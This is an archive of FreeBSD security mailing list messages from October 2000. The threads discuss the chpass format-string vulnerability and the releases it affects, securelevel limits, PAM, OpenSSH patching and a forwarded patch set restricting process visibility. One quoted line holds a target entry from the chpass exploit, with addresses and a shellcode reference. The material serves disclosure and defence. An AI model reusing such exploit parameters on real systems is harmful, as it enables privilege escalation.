me with my new hat on. > > > > I'd support this strongly, both as Warner Losh, Committer and as > > Warner Losh, Security Officer.
My current job uses -stable and needs > > to have it be sane at "all"[*] times, or we waste a lot of effort > > bringing in and backing out unstable versions (we do some sanity > > testing before bringing a version in, but there's only so much you can > > do). > > I think a formal MFC process may be too stifling, unless we have a > VERY responsive MFC team. Consider that we don't want the same thing > to happen as did with 3.x, where 4.0-CURRENT was allowed to diverge so > much that merging bugfixes became difficult. > > I'd settle for committers being more cautious about merging their own > changes and self-managing the process better. I was thinking of it much more in the terms of a list like "reviews@FreeBSD.org" which would be private for committers posting changes they want reviewed again just before inclusion in -STABLE and anyone who wanted to could review them (I would like to, for example). If I have "X" I want reviewed, it would be nice to have a target instead of shooting in the dark. One consolidated place for people to post need for reviews would go a long way towards this goal, don't you think? -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve!
/ green@FreeBSD.org `------------------------------' From owner-freebsd-security Wed Oct 4 3:28:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 69DFD37B503; Wed, 4 Oct 2000 03:28:36 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA03073; Wed, 4 Oct 2000 03:28:36 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 03:28:36 -0700 From: Kris Kennaway To: Matt Dillon Cc: freebsd-security@FreeBSD.ORG Subject: Re: Proposed minor mod to openssh for interactive operation Message-ID: <20001004032836.B98174@freefall.freebsd.org> References: <200009300023.e8U0NUW20137@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200009300023.e8U0NUW20137@earth.backplane.com>; from dillon@earth.backplane.com on Fri, Sep 29, 2000 at 05:23:30PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Sep 29, 2000 at 05:23:30PM -0700, Matt Dillon wrote: > I have trivial patches (two minor tests), any objections to my committing > them? Also, I'm not sure whether we are trying to keep our openssh > synced with openbsd's. Does anyone know the procedure for making > changes to openssh in FreeBSD's CVS tree? You should contribute these patches back to the OpenSSH developers first - see www.openssh.com for contact details. I don't like making changes to our version of openssh unless we have to, since it makes my job harder managing the divergences when I import a new version. If you really can't get them to accept the patches, then let me know.. Kris -- In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe From owner-freebsd-security Wed Oct 4 3:40:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id B8D7B37B503; Wed, 4 Oct 2000 03:39:53 -0700 (PDT) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id RAA90188; Wed, 4 Oct 2000 17:37:36 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru) Date: Wed, 4 Oct 2000 17:37:36 +0700 (NSS) From: Max Khon To: Dima Dorfman Cc: "Andrey V. Sokolov" , Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.org Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004102239.780551F0D@static.unixfreak.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Wed, 4 Oct 2000, Dima Dorfman wrote: > > Do not forget! chpass, chfn, chsh, ypchpass, ypchfn, ypchsh are hard > > links! This exploit will work with any command from this set, if a > > little modification of the exploit's code is done. > > And since they're hard links, when you [un]set the modes for one, the > others get it too. In other words, unless you go out of your way to > keep chfn/chsh/etc. setuid to root, chmod 555 `which chpass` is > sufficient. btw here is another post to bugtraq (from our security officer) --- cut here --- From imp@VILLAGE.ORG Wed Oct 4 17:35:53 2000 Date: Tue, 3 Oct 2000 23:17:48 -0600 From: Warner Losh To: BUGTRAQ@SECURITYFOCUS.COM Subject: Re: BSD chpass In message <20001004024548.A516@dissension.net> caddis writes: : { "FreeBSD 4.0-RELEASE ", 167, 0x805023c, 0xbfbffc68, bsd_shellcode }, Just FYI, 4.1-RELEASE and newer aren't vulnerable. This problem was fixed by us in our sweep of the tree in search of the format bugs that came to light in late June.
Warner Losh FreeBSD Security Officer --- cut here --- /fjoe From owner-freebsd-security Wed Oct 4 5:14:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id CBBDB37B502; Wed, 4 Oct 2000 05:14:22 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id IAA03866; Wed, 4 Oct 2000 08:14:21 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 4 Oct 2000 08:14:21 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Kris Kennaway Cc: Dima Dorfman , Alfred Perlstein , Mike Silbersack , security@FreeBSD.org Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004025836.A84165@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Kris Kennaway wrote: > mounting is still allowed at all securelevels, so you could also null > mount over the top of /usr/bin even if /usr/bin is schg. The fact that > you can mount volumes at high securelevel seems to mean there is no > way you can protect a running system against tampering with a given > file (i.e. replacing the runtime-visible instance of a given file). > > Robert Watson would probably start talking about MAC about now :-) but > I'm not sure if this is something which should be fixed as a security > problem, or if it is just not practical to expect securelevels to > prevent run-time tampering of a given file (leaving aside the issues > of protecting the boot path against taking control of the machine at > next reboot time, which only happens as a result of incomplete > coverage of the relevant files and directories with schg) Heh, you know me too well.
(Either that, or I talk too much :-). As Kris points out, securelevels are generally unable to provide the level of security that they promise without effectively crippling the system. I would generally advise that people not rely on securelevels providing more than ``best effort'' improvements in the event of a root compromise: as someone pointed out (Dima?), securelevels are great for confusing script kiddies, but a qualified and knowledgeable attacker can bypass their protection given root privilege. To be honest, I'd like to see the last vestiges of the securelevel concept in userland (the schg flag on some binaries) be made optional in the installworld process, as it not only doesn't provide bullet-proof protection, but does impede portable upgrades across file system types (try doing an installworld on an NFS mounted file system). The script kiddie puzzling element is certainly entertaining, but should be optional :-). There are a number of structural improvements that could be made to securelevels and our boot process to correct some of these issues, but I think a more general solution is needed. Two goals of the TrustedBSD project are to (a) reduce the target presented by the "root" user by breaking out privilege in a modular fashion, and (b) provide a system integrity policy that is capable of protecting access to privilege (especially kernel privilege) in the face of compromise of some parts of the system. Hopefully, the resulting system will be easier to use and manage than properly implemented securelevels, but I would suspect still harder to manage than a normal UNIX system. As the features will be optional, I think that's an acceptable trade-off. If there are people interested in discussing this further, I'd welcome participation in the trustedbsd-discuss mailing list :-).
Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services From owner-freebsd-security Wed Oct 4 5:42:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.mail.yahoo.com (smtp1.mail.yahoo.com [128.11.69.60]) by hub.freebsd.org (Postfix) with SMTP id 192D137B66C for ; Wed, 4 Oct 2000 05:42:20 -0700 (PDT) Received: from unknown (HELO ori) (209.88.175.222) by smtp.mail.vip.suc.yahoo.com with SMTP; 4 Oct 2000 12:42:17 -0000 X-Apparently-From: Message-ID: <041601c02e09$c8e6dbd0$2600a8c0@ori> From: "Richard Jones" To: Subject: PAM in FreeBSD Date: Wed, 4 Oct 2000 15:48:29 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0413_01C02E1A.8A650EC0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi I'm a newbie to this list so if this question has been asked please refer me to it. In the last couple of days I've been checking the PAM state in the FreeBSD 4.1 release. Let's see if I understand exactly how PAM works: According to what was configured to it, PAM authenticates users trying to enter the machine. In order to support the PAM control on user's authentication to the machine, there are 2 groups of applications.
group 1: Those that are responsible for authenticating users (such as: login, sshd, su, and others), are supposed to have a section (probably ifdefed) that uses PAM to authenticate the user instead of the standard way it uses. For instance: login can use something other than the usual unix password to authenticate users. group 2: Those that are responsible for the actual authentication (such as: simple unix, radius, tacplus, etc.). These applications don't require the libpam module support. The libpam itself looks very good, with a lot of useful modules (unix, radius, tacplus, skey, kerberos, ssh, etc.). Please correct me if I'm wrong. After walking through the FreeBSD sources I saw that: 1. none of the first group applications (except: login) has the support for PAM authentication (ifdefed). 2. sshd support for PAM: I saw that there was a discussion in this mailing list about this subject. There was a suggestion to change the makefile to use libcrypt. Does it mean the ssh-pam interaction works after this change? My questions are: a. Is any of my assumptions/conclusions wrong? b. Is there any work done on the subject to fix it? c. How stable is PAM on FreeBSD? d. Any known problems that you know from your experience? e. Any helpful suggestions? f. I'm especially interested in PAM for using for group 1 (login and SSH) and for group 2 (radius, tacplus, unix, ssh). Does anyone have any experience with using them through PAM? Sorry for this long mail (I'll keep track of the mailing list from now on so this is a one timer). Thanks in advance for all your help RJ.
From owner-freebsd-security Wed Oct 4 6:57:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (Postfix) with ESMTP id 1C1EA37B502 for ; Wed, 4 Oct 2000 06:57:27 -0700 (PDT) Received: (from smap@localhost) by whistle.com (8.10.0/8.10.0) id e94DvQA06427 for ; Wed, 4 Oct 2000 06:57:26 -0700 (PDT) Received: from pau-amma.whistle.com( 207.76.205.64) by whistle.com via smap (V2.0) id xma006425; Wed, 4 Oct 2000 06:57:26 -0700 Received: (from dhw@localhost) by pau-amma.whistle.com (8.11.0/8.11.0) id e94DvQc92408 for security@FreeBSD.ORG; Wed, 4 Oct 2000 06:57:26 -0700 (PDT) (envelope-from dhw) Date: Wed, 4 Oct 2000 06:57:26 -0700 (PDT) From: David Wolfskill Message-Id: <200010041357.e94DvQc92408@pau-amma.whistle.com> Subject: Re: cvs commit: src/etc inetd.conf Cc: security@FreeBSD.ORG In-Reply-To: <200010031722.NAA41823@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Date: Tue, 3 Oct 2000 13:22:27 -0400 (EDT)
>From: Garrett Wollman
>< said:
>> gets no response (after a time-out) it would be entitled to retry a
>> few times in case of packet loss.  *But* if it gets a RST, which is a

>If net.inet.tcp.blackhole is set, an RST will not be emitted.

If the concern is that you don't want sendmail to even try to do the
auth, just insert

	define(`confTO_IDENT', `0s')dnl

in the .mc file from which the .cf is generated, and it won't do that
any more.

[Sorry; had hoped to respond yesterday, and got involved with other
things.  And the mail backlog may be such that someone already pointed
this out; my apologies if so.  dhw]

Cheers,
david
-- 
David Wolfskill		dhw@whistle.com		UNIX System Administrator
Desk: 650/577-7158	TIE: 8/499-7158		Cell: 650/759-0823

From owner-freebsd-security Wed Oct 4 7:32:29 2000
Date: Wed, 4 Oct 2000 09:32:46 -0500
From: Will Andrews
To: Roman Shterenzon
Cc: Garrett Wollman, security@FreeBSD.ORG
Subject: Re: blackhole [was: Re: cvs commit: src/etc inetd.conf]
Message-ID: <20001004093246.H26605@puck.firepipe.net>
References: <200010031722.NAA41823@khavrinen.lcs.mit.edu>
In-Reply-To: from roman@xpert.com on Wed, Oct 04, 2000 at 11:11:04AM +0200

On Wed, Oct 04, 2000 at 11:11:04AM +0200, Roman Shterenzon wrote:
> I found it breaks a couple of things in gnome as well.
> I still don't see any reason for a gnome application to try to connect to
> some ports, when even in orbitrc the ipv4 and ipv6 are disabled, but it's
> a fact.
> This is a gnome problem however.
> FreeBSD-GNOME guy, can you hear me ? :)

Ade's not responsible for GNOME stupidity like that. ;->

-- 
Will Andrews - Physics Computer Network wench
The Universal Answer to All Problems - "It has something to do with physics."
-- Comic on door of Room 240, Physics Building, Purdue University

From owner-freebsd-security Wed Oct 4 7:47:25 2000
Date: Wed, 4 Oct 2000 10:47:15 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200010041447.KAA54350@khavrinen.lcs.mit.edu>
To: Kris Kennaway
Cc: Dima Dorfman, Alfred Perlstein, Mike Silbersack, security@FreeBSD.ORG
Subject: Re: BSD chpass (fwd)
In-Reply-To: <20001004023249.B76230@freefall.freebsd.org>
References: <20001004021948.A76230@freefall.freebsd.org> <20001004092758.335931F0A@static.unixfreak.org> <20001004023249.B76230@freefall.freebsd.org>

< said:
> I think you're right. Which is a good reason why your /usr/bin should
> be schg too ;-)

Actually, sappnd on all the directories which might be in (or on the way
to) root's path would be enough.

-GAWollman

From owner-freebsd-security Wed Oct 4 7:48:47 2000
Date: Wed, 4 Oct 2000 09:48:58 -0500
From: Will Andrews
To: Alfred Perlstein
Cc: Nate Williams, Kris Kennaway, Jordan Hubbard, Paul Richards, Christopher Masto, Warner Losh, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org
Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ]
Message-ID: <20001004094858.I26605@puck.firepipe.net>
References: <85378.970625261@winston.osd.bsdi.com> <20001003192158.A14805@freefall.freebsd.org> <200010040349.VAA27923@nomad.yogotech.com> <20001004000827.B27736@fw.wintelcom.net>
In-Reply-To: <20001004000827.B27736@fw.wintelcom.net>; from bright@wintelcom.net on Wed, Oct 04, 2000 at 12:08:27AM -0700

On Wed, Oct 04, 2000 at 12:08:27AM -0700, Alfred Perlstein wrote:
> > However, I didn't bother making the fix available because I felt it
> > might give people the wrong impression.  Just because *I* am willing to
> > support a really old release such as FreeBSD 2, I still feel the users
> > should be 'encouraged' to use newer releases.  By not making those fixes
> > available (which were in fact rather trivial to do), those folks who
> > aren't capable of fixing the bugs will be more likely to upgrade their
> > systems to a newer 'more supported' release.
> >
> > I think supporting older releases *really* needs to be done by a
> > commercial entity (or at least folks who have a commercial stake in
> > seeing it done), since the majority of developers are in it for the
> > development fun, and product support is all but fun. :(
>
> I think it's a bit selfish of you to keep these fixes to yourself,
> and it's the wrong attitude to have especially if you're confident
> about a fix, there's always people stuck with ancient releases in
> production and could use the help.

I agree with Alfred, and think that this sort of "social engineering" is
not acceptable in a project like this.

-- 
Will Andrews - Physics Computer Network wench
The Universal Answer to All Problems - "It has something to do with physics."
-- Comic on door of Room 240, Physics Building, Purdue University

From owner-freebsd-security Wed Oct 4 7:57:15 2000
Date: Wed, 4 Oct 2000 09:56:56 -0500
From: Ade Lovett
To: Roman Shterenzon
Cc: security@FreeBSD.ORG
Subject: Re: blackhole [was: Re: cvs commit: src/etc inetd.conf]
Message-ID: <20001004095656.C5318@FreeBSD.org>
References: <200010031722.NAA41823@khavrinen.lcs.mit.edu>
In-Reply-To: from roman@xpert.com on Wed, Oct 04, 2000 at 11:11:04AM +0200

On Wed, Oct 04, 2000 at 11:11:04AM +0200, Roman Shterenzon wrote:
> I found it breaks a couple of things in gnome as well.
> I still don't see any reason for a gnome application to try to connect to
> some ports, when even in orbitrc the ipv4 and ipv6 are disabled, but it's
> a fact.
> This is a gnome problem however.
> FreeBSD-GNOME guy, can you hear me ? :)

You're right, it's a GNOME problem.  Head over to http://bugs.gnome.org/,
and fill out a bug report detailing all the information you neglected to
mention here, and I'm sure they'll go fix it in an appropriate manner.

"gnome application" and "some ports" is kinda hazy.

HTH.  HAND.

-aDe

-- 
Ade Lovett, Austin, TX.
ade@FreeBSD.org				FreeBSD: The Power to Serve
					http://www.FreeBSD.org/

From owner-freebsd-security Wed Oct 4 8:11:50 2000
Message-Id: <200010041509.e94F9Tx35480@cwsys.cwsent.com>
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
To: Bill Fumerola
Cc: Chris Wasser, freebsd-security@FreeBSD.ORG
Subject: FreeBSD History
In-reply-to: Your message of "Tue, 03 Oct 2000 16:07:46 EDT." <20001003160745.A38472@jade.chc-chimes.com>
Date: Wed, 04 Oct 2000 08:08:44 -0700

In message <20001003160745.A38472@jade.chc-chimes.com>, Bill Fumerola writes:
> On Tue, Oct 03, 2000 at 12:50:25PM -0600, Chris Wasser wrote:
>
> > Sometimes we are forced to work with people we may not get along
> > with, this is how life works. It surprises me that the core team
> > would degrade into a school-yard fight over the actions of one
> > person, isn't this what happened to NetBSD/OpenBSD? Are we headed
> > along that road now?
>
> The OpenBSD/NetBSD split occurred because someone with content and
> clue had a disagreement. Luckily, bitching and whining will never
> magically generate code, so I wouldn't worry.

How did FreeBSD get started?

Regards,                         Phone:  (250)387-8437
Cy Schubert                        Fax:  (250)387-5766
Team Leader, Sun/DEC Team     Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Wed Oct 4 8:32:28 2000
Date: Wed, 4 Oct 2000 11:32:23 -0400 (EDT)
From: Trevor Johnson
To: Cy Schubert - ITSD Open Systems Group
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD History
In-Reply-To: <200010041509.e94F9Tx35480@cwsys.cwsent.com>

> How did FreeBSD get started?

See /usr/share/doc/en_US.ISO_8859-1/books/handbook/history.html .
-- 
Trevor Johnson
http://jpj.net/~trevor/gpgkey.txt

From owner-freebsd-security Wed Oct 4 8:47:48 2000
Date: Wed, 4 Oct 2000 08:47:29 -0700
From: "Crist J. Clark"
To: freebsd-security@freebsd.org
Subject: Fwd: eth-security : ANNOUNCE : Resources no for ALL
Message-ID: <20001004084729.C25121@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu

In the recent flame storms on -security, it may have slipped by when I
was deleting threads and certain authors (who will remain nameless)
without looking at the contents, but I have not seen any mention of
this.

This was posted to BugTraq yesterday. It is a series of patches to
restrict certain information from non-priv'ed users. If they actually
work well (I have not tried them), is there a reason they could not be
added and enabled with a make.conf setting or kernel option or both?
The patches came with no licensing information, so I don't know what
the author is up to. Heck, he may have already provided them to some
committers for a look, I dunno. Like I said, I did not see anything
about this on here and thought this list would be interested.

(BTW, at least when I tried yesterday, the ftp site given did not have
the code, but the http URL worked.)

-------- Original Message --------
Subject: eth-security : ANNOUNCE : Resources no for ALL
Date: Mon, 2 Oct 2000 14:48:57 +0200
From: yeti
Reply-To: yeti
To: BUGTRAQ@SECURITYFOCUS.COM

--== Resources Not for All ==--  version 1.0
by y3t1@eth-security.net

-- ===== --
  Overview
-- ===== --

RnA is a collection of security improvements for FreeBSD 4.0-RELEASE.

Restricted kernel process table and proc filesystem
*---------------------------------------------------*

This patch gives non-root users limited access to the process table;
only root sees all processes and has access to their entries in the proc
filesystem. Permission on directories in the proc filesystem is changed
to 550 (dr-xr-x---). Non-root users can only see their own processes.

Some examples:

from root console:

pc1:~# ps ax
  PID  TT  STAT      TIME COMMAND
    0  ??  DLs    0:00.01  (swapper)
    1  ??  ILs    0:00.17 /sbin/init --
    2  ??  DL     0:03.64  (pagedaemon)
    3  ??  DL     0:00.00  (vmdaemon)
    4  ??  DL     0:00.01  (bufdaemon)
    5  ??  DL     0:00.54  (syncer)
   25  ??  Is     0:00.00 adjkerntz -i
[...]

from user:

pc1:~$ ps ax
  PID  TT  STAT      TIME COMMAND
  154  v3  Ss     0:00.17 -bash (bash)
  406  v3  R+     0:00.00 ps ax

Restricted who/w/last
*---------------------------------------------------*

Restricted who/w/last gives limited access to utmp/wtmp entries. Users
can see only their own logins to the system (no group like w_all,
w_grp), but if a user is added to group w_grp they can see their own and
their group's logins. Group w_all is for trusted users that have full
read access to utmp/wtmp.
for example:

from root console:

pc1:~# who
root     ttyv0    Sep 27 21:32
root     ttyv1    Sep 27 20:20
y3t1     ttyp1    Sep 27 22:06 (100.0.0.2)
blah     ttyp2    Sep 27 20:30 (195.17.21.113)
lump     ttyp5    Sep 20 13.56 (63.30.55.243)

from non-root console:

pc1:~$ who
y3t1     ttyp1    Sep 27 22:06 (100.0.0.2)

from non-root console if user is added to group w_all:

pc1:~$ who
root     ttyv0    Sep 27 21:32
root     ttyv1    Sep 27 20:20
y3t1     ttyp1    Sep 27 22:06 (100.0.0.2)
blah     ttyp2    Sep 27 20:30 (195.17.21.113)
plum     ttyp5    Sep 20 13.56 (63.30.55.243)

from non-root console if user is added to group w_grp:

pc1:~$ who
y3t1     ttyp1    Sep 27 22:06 (100.0.0.2)
blah     ttyp2    Sep 27 20:30 (195.17.21.113)
plum     ttyp5    Sep 20 13.56 (63.30.55.243)

Commands w/last are restricted in a similar way.

How to Install
*---------------------------------------------------*

De-tar the rna archive

  tar xvzf rna.tar.gz

and run

  cd RnA/
  ./RnA
  cd /sys/compile/your_kernel_name/
  make config
  make
  make install
  cd /usr/src/usr.bin/who
  make
  make install
  cd /usr/src/usr.bin/w
  make
  make install
  cd /usr/src/usr.bin/last
  make
  make install

Check permissions on who/w/last (they need to be sgid to the uwtmp group)
and reboot your system.

How to get
*---------------------------------------------------*

New versions of rna you can get from:

  ftp://ftp.eth-security.net/pub/rna.tar.gz
  http://www.eth-security.net/files/rna.tar.gz
  http://rast.lodz.pdi.net/~y3t1/rna.tar.gz

Greets
*---------------------------------------------------*

vx@mtl.pl - inspired me to write these patches
z33d@eth-security.net - b00m b00m b00m ... hand over the money
Admins from Institute of Physics (Wroclaw) - for testing patches and good dinners
all on #sigsegv@ircnet: z33d, funkySh, Kris, detergent, crashkill, cliph, xfer
and other cool guys: rastlin, tmoggie, Shadow, Trolinka, lcamtuf, kodzak, venglin

----- End forwarded message -----

-- 
Crist J. Clark                           cjclark@alum.mit.edu

From owner-freebsd-security Wed Oct 4 9:18:33 2000
Date: Wed, 4 Oct 2000 10:18:24 -0600 (MDT)
Message-Id: <200010041618.KAA00416@nomad.yogotech.com>
From: Nate Williams
To: David Wolfskill
Cc: security@FreeBSD.ORG
Subject: Re: cvs commit: src/etc inetd.conf
In-Reply-To: <200010041357.e94DvQc92408@pau-amma.whistle.com>
References: <200010031722.NAA41823@khavrinen.lcs.mit.edu> <200010041357.e94DvQc92408@pau-amma.whistle.com>
Reply-To: nate@yogotech.com (Nate Williams)

> >> gets no response (after a time-out) it would be entitled to retry a
> >> few times in case of packet loss.  *But* if it gets a RST, which is a
>
> >If net.inet.tcp.blackhole is set, an RST will not be emitted.
>
> If the concern is that you don't want sendmail to even try to do the
> auth, just insert
>
> 	define(`confTO_IDENT', `0s')dnl
>
> in the .mc file from which the .cf is generated, and it won't do that
> any more.

Except the issue is less with the local sendmail, but other mail programs
delivering email *to* your local mail server.

Nate

From owner-freebsd-security Wed Oct 4 9:29:48 2000
Date: Wed, 4 Oct 2000 09:29:45 -0700 (PDT)
From: Matt Dillon
Message-Id: <200010041629.e94GTjD24278@earth.backplane.com>
To: Kris Kennaway
Cc: freebsd-security@FreeBSD.org
Subject: Re: Proposed minor mod to openssh for interactive operation
References: <200009300023.e8U0NUW20137@earth.backplane.com> <20001004032836.B98174@freefall.freebsd.org>

:
:On Fri, Sep 29, 2000 at 05:23:30PM -0700, Matt Dillon wrote:
:
:> I have trivial patches (two minor tests), any objections to my committing
:> them?  Also, I'm not sure whether we are trying to keep our openssh
:> synced with openbsd's.  Does anyone know the procedure for making
:> changes to openssh in FreeBSD's CVS tree?
:
:You should contribute these patches back to the OpenSSH developers
:first - see www.openssh.com for contact details.  I don't like making
:changes to our version of openssh unless we have to, since it makes my
:job harder managing the divergences when I import a new version.  If
:you really can't get them to accept the patches, then let me know..
:
:Kris

Will do!

-Matt

From owner-freebsd-security Wed Oct 4 9:43:16 2000
Date: Wed, 4 Oct 2000 11:43:08 -0500
From: "Jacques A. Vidrine"
To: cjclark@alum.mit.edu
Cc: freebsd-security@freebsd.org
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
Message-ID: <20001004114308.B23379@hamlet.nectar.com>
References: <20001004084729.C25121@149.211.6.64.reflexcom.com>
In-Reply-To: <20001004084729.C25121@149.211.6.64.reflexcom.com>; from cjclark@reflexnet.net on Wed, Oct 04, 2000 at 08:47:29AM -0700

On Wed, Oct 04, 2000 at 08:47:29AM -0700, Crist J. Clark wrote:
> This was posted to BugTraq yesterday. It is a series of patches to
> restrict certain information from non-priv'ed users.

man jail

-- 
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Wed Oct 4 10:14:58 2000
Date: Wed, 4 Oct 2000 12:16:02 -0500 (CDT)
From: Mike Silbersack
To: security@freebsd.org
Subject: Re: OpenBSD Security Advisory (fwd)

Are we patched?

Mike "Silby" Silbersack

---------- Forwarded message ----------
Date: Wed, 4 Oct 2000 00:31:03 -0700
From: K2
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: OpenBSD Security Advisory

Hi,

Here is another exploit for an application (fstat) that OpenBSD's format
string audit has seemingly forgotten about.  What I would like to know is
why this and a number of other privileged applications have security
vulnerabilities in them.  They WERE fixed, but NO ADVISORY nor ANY MENTION
IN THEIR DAILY CHANGELOG!  How can the impact of the vulnerability not be
realized when they occur in something as privileged as that would be using
pw_error()?

From owner-freebsd-security Wed Oct 4 10:19:23 2000
Message-Id: <200010041719.LAA37604@harmony.village.org>
To: Mike Tancsa
Subject: Re: Fwd: BSD chpass
Cc: freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Wed, 04 Oct 2000 01:12:59 EDT." <4.2.2.20001004011210.035225e0@mail.sentex.net>
References: <4.2.2.20001004011210.035225e0@mail.sentex.net>
Date: Wed, 04 Oct 2000 11:19:16 -0600
From: Warner Losh

In message <4.2.2.20001004011210.035225e0@mail.sentex.net> Mike Tancsa writes:
: OK, here is a nasty bugtraq posting :-(

There will be an advisory about this, but the short answer is:
	o 1.x is NOT vulnerable
	o 2.x, and 3.x through 3.5.1-RELEASE and 4.0-RELEASE are vulnerable
	o 4.1-RELEASE and 4.1.1-RELEASE are NOT vulnerable
	o 2.1.x-stable, 2.2.8-stable and 3.5.1-stable have been fixed as
	  of 8 hours ago.

Warner

From owner-freebsd-security Wed Oct 4 10:20:50 2000
Message-Id: <200010041720.LAA37630@harmony.village.org>
To: Matt Heckaman
Subject: Re: Fwd: BSD chpass
Cc: Mike Tancsa, freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Wed, 04 Oct 2000 01:16:50 EDT."
Date: Wed, 04 Oct 2000 11:20:37 -0600
From: Warner Losh

In message Matt Heckaman writes:
: I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on
: my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be
: vulnerable in a method outside the scope of the posted exploit. I just
: found out about this 5 minutes ago and ran to turn off the suid bit :P

4.1R and 4.1.1R are known to be safe.  3.5.1-stable was patched last
night at about 0600GMT.

Warner

From owner-freebsd-security Wed Oct 4 10:21:45 2000
Message-Id: <200010041721.LAA37650@harmony.village.org>
To: Mike Silbersack
Subject: Re: Fwd: BSD chpass
Cc: Matt Heckaman, Mike Tancsa, freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Wed, 04 Oct 2000 00:24:19 CDT."
Date: Wed, 04 Oct 2000 11:21:40 -0600
From: Warner Losh

In message Mike Silbersack writes:
: Unless the nsswitch changes fixed it, 4.1.1 should still be vulnerable -
: there are no messages in the cvs logs for chpass indicating any
: security-related changes recently. (For both FreeBSD and OpenBSD.)

No.  Kris' sweep of the tree on July 12th for format problems fixed it.
Ditto with Millert's sweep of the tree on or about June 30th for OpenBSD.

Warner

From owner-freebsd-security Wed Oct 4 10:22:06 2000
Message-ID: <008001c02e26$c20c6100$03030303@dns>
From: "John"
To: "Mike Tancsa", "Warner Losh"
References: <4.2.2.20001004011210.035225e0@mail.sentex.net> <200010041719.LAA37604@harmony.village.org>
Subject: Re: Fwd: BSD chpass
Date: Wed, 4 Oct 2000 13:15:55 -0400

chmod a-s /usr/bin/chpass
or
chmod 700 /usr/bin/chpass

Solution or not ?  I believe that will work out just fine.

----- Original Message -----
From: "Warner Losh"
To: "Mike Tancsa"
Sent: Wednesday, October 04, 2000 1:19 PM
Subject: Re: Fwd: BSD chpass

> In message <4.2.2.20001004011210.035225e0@mail.sentex.net> Mike Tancsa writes:
> : OK, here is a nasty bugtraq posting :-(
>
> There will be an advisory about this, but the short answer is:
> 	o 1.x is NOT vulnerable
> 	o 2.x, and 3.x through 3.5.1-RELEASE and 4.0-RELEASE are vulnerable
> 	o 4.1-RELEASE and 4.1.1-RELEASE are NOT vulnerable
> 	o 2.1.x-stable, 2.2.8-stable and 3.5.1-stable have been fixed as
> 	  of 8 hours ago.
>
> Warner

From owner-freebsd-security Wed Oct 4 10:23:40 2000
Message-Id: <200010041723.LAA37682@harmony.village.org>
To: Tim Yardley
Subject: Re: Fwd: BSD chpass
Cc: Mike Silbersack, freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Wed, 04 Oct 2000 01:18:25 CDT." <5.0.0.25.2.20001004011552.02eee900@students.uiuc.edu>
References: <5.0.0.25.2.20001004011552.02eee900@students.uiuc.edu>
Date: Wed, 04 Oct 2000 11:23:26 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

